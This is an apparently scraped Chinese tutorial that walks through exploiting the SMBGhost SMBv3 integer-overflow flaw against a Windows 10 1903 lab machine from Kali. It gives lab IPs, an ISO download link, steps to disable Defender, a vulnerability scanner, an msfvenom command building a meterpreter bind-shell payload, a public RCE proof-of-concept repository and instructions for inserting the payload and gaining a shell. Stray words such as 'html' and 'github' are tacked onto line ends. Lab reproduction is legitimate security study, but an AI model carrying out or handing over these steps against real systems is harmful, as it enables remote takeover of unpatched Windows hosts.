Microsoft服務器消息塊(SMB)協議是Microsoft Windows中使用的一項Microsoft網絡文件共享協議。在大部分windows系統中都是默認開啓的,用於在計算機間共享文件、打印機等。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源於SMBv3沒有正確處理壓縮的數據包,在解壓數據包的時候使用客戶端傳過來的長度進行解壓時,並無檢查長度是否合法,最終致使整數溢出。利用該漏洞,黑客可直接遠程攻擊SMB服務端遠程執行任意惡意代碼,亦可經過構建惡意SMB服務端誘導客戶端鏈接從而大規模攻擊客戶端。html
Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)python
Kali系統 ip:192.168.44.128
win10系統ip:192.168.44.142git
受這次漏洞影響的win10系統,我這邊用的是(複製下方連接可下載)ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C水4C印401036B0B1EBA64476A95F338|/ (去掉其中的水印二字)github
ps:關閉defender防火牆windows
一、查看環境狀況Windows版本,按win+r,在彈出窗口中輸入winver服務器
二、使用工具檢測靶機是否存在漏洞,檢測工具下載地址https://github.com/ollypwn/SMBGhost運行結果以下圖,證實靶機存在此漏洞網絡
三、kali進入msf,使用msf生成木馬,並查看是否生成功msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python>exploit.pytcp
四、下載poc,地址:https://github.com/chompie1337/SMBGhost_RCE_PoC.git工具
五、將msf中生成的exploit.py 生成的code,替換到poc下載文件中的exploit.py的USER_PAYLOAD參數,並把參數buf改成USER_PAYLOADspa
六、運行poc:python3 exploit.py -ip xx.xx.xx.xx (若是出現報錯physical read primitive failed! 多運行幾回)
七、啓動msf監聽本地端口(run失敗就多run幾回)
八、得到靶機權限,攻擊成功